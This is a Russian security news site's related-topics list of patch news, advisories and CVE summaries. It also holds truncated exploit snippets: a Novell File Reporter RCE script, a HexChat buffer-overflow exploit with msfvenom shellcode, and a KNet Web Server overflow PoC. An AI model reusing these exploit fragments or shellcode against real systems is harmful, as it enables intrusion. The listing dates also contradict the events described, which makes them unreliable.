Смотрите также связанные темы 12.04.2018 Компания Microsoft выпустила пакет обновлений для пяти «критических» уязвимостей в своих продуктах Четыре «критических» уязвимости имеют отношение к ключевым системам Windows, а пятая — к Content Management Server.
09.11.2018 2008-11-08 - [slackware-security] cups (SSA:2008-312-01) -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA1[slackware-security] cups (SSA:2008-312-01)New cups packages are available for Slackware 12.0, 12.1, and -current tofix security issues.More details about this issue may be found in the CommonVulnerabilities and Exposures (CVE) database: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3639 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3640 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3641Here are the details from the Slackware 12.1 ChangeLog:+-------------------...
14.01.2018 Краткий обзор исправлений от Microsoft за январь 2009 Microsoft выпустила первое в 2009 году плановое уведомление безопасности, в котором устранила 3 уязвимости в службе Server.
08.02.2018 Microsoft готовит к выходу четыре патча Во вторник 10 февраля Microsoft выпустит 4 обновления для программного обеспечения, из которых два призваны исправить критические уязвимости в Windows, Internet Explorer и Microsoft Exchange Server.
17.02.2018 CVE-2009-0611 Multiple cross-site scripting (XSS) vulnerabilities in qfsearch/AdminServlet in QuickFinder Server in Novell Open Enterprise Server 1.x allow remote attackers to inject arbitrary web script or HTML via (1) the siteloc parameter in a displayaddsite action, the site parameter in a (2) generalproperties or (3) clusterserviceproperties action, (4) the adminurl parameter in a global action, or (5) the print-list parameter.
16.04.2018 Oracle исправила 43 уязвимости в своих продуктах Корпорация Oracle выпустила ежеквартальный набор исправлений для своих продуктов. На этот раз исправлению подверглись 43 уязвимости в различных продуктах, в том числе в Oracle Database, Oracle Application Server, E-Business Suite, PeopleSoft Enterprise и WebLogic Server.
12.12.2018 Novell File Reporter Agent XML Parsing Remote Code Execution Vulnerability (0day) # wwww.abysssec.com # Novell File Reporter Agent XML Parsing Remote Code Execution Vulnerability (0day) # CVE-2012-4959 # @abysssec # well just one more of our 0day got published after ~2 year # here is info : https://community.rapid7.com/community/metasploit/blog/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959 # and here is our exploit import httplib, md5, sys def message_MD5(arg): v = "SRS" + arg + "SERVER" m = md5.new(v) return m.hexdigest() def g...
07.09.2018 Исследователь обнаружил множественные уязвимости в продуктах FireEye Специалист опубликовал PoC-код бреши, позволяющей прочитать произвольные файлы, и предложил на продажу еще три уязвимости.
08.04.2018 HexChat 2.9.4 Local Exploit Submission #!/usr/bin/python # HexChat 2.9.4 Local Exploit # Bug found by Jules Carter < @iMulitia > # Exploit by Matt "hostess" Andreko < mandreko [at] accuvant.com > # http://www.mattandreko.com/2013/04/buffer-overflow-in-hexchat-294.html junk1 = "B" shellcode = ( # msfvenom -p windows/messagebox EXITFUNC=process BufferRegister=ESP -e x86/alpha_mixed -f c "x54x59x49x49x49x49x49x49x49x49x49x49x49x49x49" "x49x49x49x37x51x5ax6ax41x58x50x30x41x30x41x6b" "x41x41x51x32x41x42x32x42x42x30x42x42x41x42x58" "x50x38x41x42x75x4ax49x78x59x68x6bx6...
15.04.2018 KNet Web Server 1.04b - Stack Corruption BoF Exploit #!/usr/bin/perl # KNet Web Server Stack corruption BoF PoC # Written by Wireghoul - http://www.justanotherhacker.com # Date: 2013/04/11 # Version: 1.04b # Tested on: WinXP SP3 use IO::Socket::INET; $host = shift; $port = shift; print "KNet Web Server stack corruption BoF PoC - Wireghoul - http://www.justanotherhacker.comn"; die "Usage $0 <host> <port>n" unless $host && $port; $sock = IO::Socket::INET->new("$host:$port") or die "Unable to connect to $host:$portn"; # Shellcode for calc.exe $shellcode= "x89xe2xdaxd5xd9x72xf4x5d...
|